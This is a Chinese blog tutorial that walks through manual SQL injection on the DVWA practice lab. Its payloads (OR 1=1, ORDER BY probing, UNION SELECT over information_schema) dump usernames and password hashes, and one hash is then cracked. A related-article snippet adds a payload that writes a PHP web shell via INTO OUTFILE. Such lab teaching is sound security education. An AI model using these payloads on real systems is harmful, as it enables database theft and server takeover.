SQL注入详细入门笔记一(DVWA)

最新推荐文章于 2023-09-16 22:47:49 发布
最新推荐文章于 2023-09-16 22:47:49 发布
阅读量1.2k 收藏 15
点赞数 1
分类专栏: 渗透测试 sql注入 文章标签: mysql sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lurao/article/details/108104862
版权

SQL注入笔记

目标:拿到表中登录用户账号密码;

[注意:]全过程中sql语句中的单引号都应该是英文输入法下的单引号;需要提前准备好DVWA环境,可参考https://www.cnblogs.com/sevenbug/p/11417100.html

  1. 入口

 

  1. 检测能否进行sql注入:输入单引号,点击提交报错

  1. 使用参数1’ or 1=1;#进行注入可以得到当前表下所有信息

 

  1. 可以通过1' or 1=1 order by 2;# (或9、8、7、6。。。依次尝试)判断出查询范围的字段个数;

 

5、通过这里基本可以推断出后台支持的sql语句结构为:SELECT first_name, last_name FROM 表名 WHERE user_id = '$id'

 

6、可以使用1’ union all select 1,2;#参数注入获取得到相关参数,可以将1,2参数替换为sql参数进行查询,如替换成database():查询当前数据库;user():查询当前用户

备注:

database():查询当前数据库;

user():查询当前用户;

version():查询数据库版本信息;

@@datadir:全局变量datadir查看数据存储路径;

@@basedir:查看数据库安装路径;

@@hostname:查看hostname;

@@version_compile_os:查看操作系统;

7、我们可以使用CONCAT_WS()函数一次性查询多个函数内容;如:

 

1’union all select CONCAT_WS(CHAR(32,58,32),user(),database(),version(),@@hostname),2;#

解释:

CONCAT_WS(X,Y,Z):使用X格式的内容将Y,Z值连接起来;

CHAR(32,58,32):是通过ASCII编码后的结果,对应 :(空格:空格);

 

8、mysql基础知识铺垫;

Information_schema:mysql数据库中存储元数据的数据库;

Tables:表中存储数据库名及其对应的数据表名;

Columns:表中存储数据表名及其列名;

Table_name:表名;

Table_schema:数据库名;

Column_name:表列名;

我们可以通过database()参数查到当前数据库为dvwa;

所以我们可以通过该数据库名查询得到该数据库下的表名:

'union select table_name,table_schema from information_schema.tables where table_schema ='dvwa';#

 

9、由上一步可以看出dvwa库下面有两个表guestbook、users表,用户密码猜测应该在users表里,所有我们现在需要查询得到该表的列信息,使用columns表查看;

‘union select table_name,column_name from information_schema.columns where table_name=’users’;#

 

10、由上一步可以知道该表中有user_id,first_name,last_name,user,password,avatar几个字段,因此可以知道表名users,字段名,所以可以查询出用户名和密码;

‘union Select user,password from users;#

 

11、可以看到密码进行加密,可以使用相应工具进行解密;

21232f297a57a5a743894a0e4a801fc3   根据密码长度猜测是通过MD5进行加密,所以通过MD5进行解密。解密结果为admin

到此成功拿到用户名密码相关信息;

java web
关注
  • 1
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA通过攻略之SQL注入_dvwa sql注入(1)
2401_84968303的博客
05-12 1155
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
DVWA平台中手动SQL注入并查询数据库信息以及用户密码(Low级别)
qq_725話的博客
04-07 3558
三、基本技能实验结果与分析: 1.将安全级别设置为low: 2.进入dvwaSQL Injection界面: 在文本框里面输入id=1;此时在url中显示出了?id=1,数据库的信息显示到页面上了,有回显。 3. 在url中提交id=1’ 页面报错;如图 4. 将后面的语句通过#注释掉,此时页面正常显示 5. 我们可以知道漏洞参数是:id我们要进行的是 “字符型漏洞” 注入。以上信息确定...
sql注入dvwa
weixin_45670595的博客
03-07 3654
SQL injection %28 ( %29 ) %2c , %23 # 写一句话木马 ?id = 1'+union+select+"<?php @eval($_GET['cmd']);?>","webshell" +into+outfile+ 'D:\\phpstudy\\WWW\\dvwa\\cmd.php' --+&Submit=Submit# 关于mysql注释的用法 (dvwamysql,post方式) low 1' or '1' ='1
【无标题】DVWA sql注入 报错问题
weixin_50339521的博客
08-25 795
dvwasql注入报错问题
dvwa——sql注入
GZY0601的博客
09-16 582
Hello!转眼一看距离我上次发文章都是一年前的事情了,中职的第三年都一直备赛的路上,一次比了三个项目,搞得学的好乱,现在上了大学,开始回来复习安全的东西,说实话好久没练了很多基本的东西都忘记了,去年就一直说要写dvwa的教程,现在刚好算是可以边复习边更新。哈哈哈哈哈哈!SQL注入是一种常见的网络安全漏洞和攻击方式,它利用应用程序对用户输入数据的处理不当,使得攻击者能够在执行SQL查询时插入恶意的SQL代码。通过成功注入恶意代码,攻击者可以执行未经授权的数据库操作,获取敏感信息、篡改数据甚至完全破坏数据库
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
DVWA下的SQL注入
07-25
SQL
sql注入渗透测试工具:sqlol/DVWA
04-24
sql注入渗透测试工具:sqlol/DVWA https://xianjie0318.blog.csdn.net/article/details/112987555?spm=1001.2014.3001.5502
学习之sql注入漏洞网址的创建
06-06
在IT安全领域,SQL注入是一种常见的攻击手段,它利用了应用程序对用户输入处理不当的漏洞。这篇文章的主题是“学习之sql注入漏洞网址的创建”,它旨在帮助初学者或研究人员建立一个自定义的环境来模拟SQL注入攻击,...
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
SQL 注入 DVWA 实验
m0_63645854的博客
04-10 2047
SQL注入与自动注入
DVWA靶场SQL注入(low)
qq_61975388的博客
08-17 573
DVWA靶场SQL注入实战
DVWASQL注入(低级)
heyingcheng的博客
11-17 2449
注意:我们在输入框输入id=1' order by 1#,通过改造sql语句修改了应用程序逻辑,执行的sql语句实际上数据库中执行的是:select * from 表 where id='1' order by 1 #'。由于#已经注释掉了后面所有的内容,所以实际上的效果:select * from 表 where id='1' order by 1(#也可以换成--)继续输入1’and'1'='1或者1'='1发现可以正常回显,所以目前可以十分准确的判断存在的是sql注入中的字符型注入
小记一次DVWA靶场中SQL注入
ranuy阮的博客
02-25 738
0x01 环境介绍 DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。 0x02 测试过程 low级别,关于mysql日志 查询是否启用日志 mysql>show variables like ‘log_%’; MySQL有以下几种日志: 错误日志: -log-err 查询日志: -log 慢查询日...
mysqlsql手工注入基于回显,DVWASQL回显注入
weixin_30311179的博客
03-18 310
一.SQL注入简介1.1 SQL语句就是操作数据库的语句,SQL注入就是通过web程序在数据库里执行任意SQL语句。SQL注入是一种常见的Web安全漏洞,攻击者利用这个漏洞,可以访问和修改数据,或者利用潜在的数据库漏洞进行攻击。1.2 SQL注入漏洞威胁(1).猜解后台数据库,这是利用最多的方式,盗取网站的敏感信息。(2).绕过认证,列如绕过验证登录网站后台。(3).注入可以借助数据库的存储过程...
DVWA--SQL Injection(非盲注)--四个级别
1stPeak's Blog
10-29 1008
SQL 注入,是指攻击者通过注入恶意的SQL 命令,破坏SQL 查询语句的结构,从而达到执行恶意SQL 语句的目的。SQL 注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤“。尽管如此,SQL 注入仍是现在最常见的Web 漏洞之一 这里DVWASQL Injection(非盲注)共有四个等级 索引目录: Low Medium High Impossible ...
DvwaSQL盲注全级别学习笔记
Mbys_Lettuce的博客
09-19 1290
注入的同时观察页面返回信息,输入1' and (length(database()))=猜测的数据库长度,返回信息为User ID exists in the database则证明该数据库长度为猜测的长度。可以看到,Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了“脱裤”,Anti。因为有两个数值,且ASCII中97到122为小写字母的范围,所以把x的范围为1~4,y的范围为97~122。
DvwaSQL 注入全级别学习笔记
Mbys_Lettuce的博客
09-15 1027
SQL注入指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过不同的条件产生不同的SQL语句,这是学习dvwasql注入的相关笔记。仅供学习。 ​
sql注入 dvwa
最新发布
06-17
DVWA(Damn Vulnerable Web Application)是一个开源的安全教育工具,它的目的是作为一个靶子,用于演示和学习各种Web应用程序安全漏洞,包括SQL注入。 在DVWA中,你可以找到一个名为"SQL Injection"的模块,这个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值